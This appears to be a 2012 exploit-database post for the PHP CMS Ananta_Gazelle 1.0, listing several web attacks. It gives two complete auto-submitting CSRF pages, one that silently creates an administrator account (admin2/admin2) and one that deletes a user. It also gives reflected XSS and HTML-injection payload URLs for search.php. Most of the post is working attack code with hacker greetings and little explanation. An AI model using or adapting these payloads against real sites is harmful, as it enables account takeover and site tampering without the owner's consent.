Ananta_Gazelle1.0.zip <= Multiple Exploits = CSRF/Xss/Html code injection



EKU-ID: 1798 CVE: OSVDB-ID:
Author: Expl0!Ts Published: 2012-03-30 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


<===============================================================================>
[»]  Ananta_Gazelle1.0.zip <= Multiple Exploits = CSRF/Xss/Html code injection
<===============================================================================> 
     [»]  ---> Date :     29- 03- 2012            
     [»]  ---> Author :    Expl0!Ts     
     [»]  ---> Software Link : http://garr.dl.sourceforge.net/project/ananta/stable/Gazelle%201.0%20stable/Ananta_Gazelle1.0.zip
     [»]  ---> Version:             
     [»]  ---> Category:  php            
     [»]  ---> Tested on:  wind xp & ubuntu 10.10
     [»]  ---> Dork : your mind 
<=======================================================>

1- First Vuln its CSRF :

-------------------------------------------------------------------------------< 1

!=> add admin
!=> vuln p0c :


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title> Ananta_Gazelle1.0 add admin by : Expl0!Ts </title>
</head>

<body onload="javascript:fireForms()">
<script language="JavaScript">
var pauses = new Array( "64","51" );

function pausecomp(millis)
{
    var date = new Date();
    var curDate = null;

    do { curDate = new Date(); }
    while(curDate-date < millis);
}

function fireForms()
{
    var count = 2;
    var i=0;
   
    for(i=0; i<count; i++)
    {
        document.forms[i].submit();
       
        pausecomp(pauses[i]);
    }
}
   
</script>
<H1>Ananta_Gazelle1.0 add admin by : Expl0!Ts</H1>
<form method="GET" name="form0" action="http://127.0.0.1:80/ga/admin/index.php?Users/Add User">
<input type="hidden" name="name" value="value"/>
</form>
<form method="POST" name="form1" action="http://127.0.0.1:80/ga/admin/index.php?Users/Add User">
<input type="hidden" name="name" value="admin2"/>
<input type="hidden" name="pass" value="admin2"/>
<input type="hidden" name="controle" value="admin2"/>
<input type="hidden" name="email" value="admin2@dz4all.com"/>
<input type="hidden" name="active" value="on"/>
<input type="hidden" name="admin[]" value="2"/>
<input type="hidden" name="save" value="Add"/>
<input type="hidden" name="table" value="users"/>
<input type="hidden" name="joindate" value="2012-03-29 12:07:20"/>
</form>

</body>
</html>

----------------------------------------------------------------------------------------------------------------------< 2



!=> Delete admin 
!=> vuln p0c :


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title> Ananta_Gazelle1.0 Delete admin by : Expl0!Ts </title>
</head>

<body onload="javascript:fireForms()">
<script language="JavaScript">
var pauses = new Array( "58" );

function pausecomp(millis)
{
    var date = new Date();
    var curDate = null;

    do { curDate = new Date(); }
    while(curDate-date < millis);
}

function fireForms()
{
    var count = 1;
    var i=0;
   
    for(i=0; i<count; i++)
    {
        document.forms[i].submit();
       
        pausecomp(pauses[i]);
    }
}
   
</script>
<H1>Ananta_Gazelle1.0 Delete admin by : Expl0!Ts</H1>
<form method="POST" name="form0" action="http://127.0.0.1:80/ga/admin/index.php?Users/Delete User">
<input type="hidden" name="number" value="2"/>
<input type="hidden" name="save" value="Delete"/>
<input type="hidden" name="table" value="users"/>
</form>

</body>
</html>



-----------------------------------------------------------------------------------------------------------------


2- secnd vuln its Xss  :

http://127.0.0.1/ga/search.php?lookup=<script>alert("khaled-Ham-iTs-here n0w ")</script>


----------------------------------------------------------------------------------------------------------------




3- therd vuln its Html Code Injection :

http://127.0.0.1/ga/search.php?lookup=<h1>Hi in My vuln enJoY ...</h1>


================================================================>
==> greatz : Damane2011 & BaC & black-id & robert m °0°...°0°
==> Thnks y0u : baset and merouane and abdllah my best freind
================================================================>
EnJoY o_O